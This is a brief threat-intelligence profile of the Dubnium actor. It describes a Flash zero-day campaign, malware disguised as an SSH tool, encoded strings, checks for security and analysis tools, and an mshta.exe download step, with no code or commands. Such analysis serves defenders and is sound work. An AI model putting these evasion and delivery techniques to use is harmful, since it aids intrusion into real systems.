DUBNIUM

Dubnium is a threat actor known for its execution of actions with malicious intent, primarily through the use of malware. Their operations were notably highlighted in December when they launched a campaign exploiting Adobe Flash Player. This exploit was used to distribute various samples of Dubnium's malware, one of which included a zero-day exploit that specifically targeted Adobe Flash. The malware utilized by Dubnium is committed to disguising itself, typically appearing as a Secure Shell (SSH) tool. Despite this, the initial payload of Dubnium's malware is not particularly advanced in its functionality. The Dubnium threat actor has developed sophisticated techniques to hide its internal operations and evade detection. For example, it encodes every single string related to its malicious code, and then takes an additional step to further obscure its activities. Furthermore, the Dubnium binary extensively checks the running environment, including daily-use programs and security applications that can be used to profile its targets. It also screens for various program analysis tools such as Pin and DynamoRIO. One notable characteristic of Dubnium's methodology involves the use of highly organized exploit code with broad support for different operating system flavors. After spawning the mshta.exe process with the URL to download, the malware waits before opening the mshta.exe process and searching open file handles for a handle associated with the downloaded content. This level of meticulousness underlines the threat posed by Dubnium, despite the relatively unadvanced nature of their first-stage payload.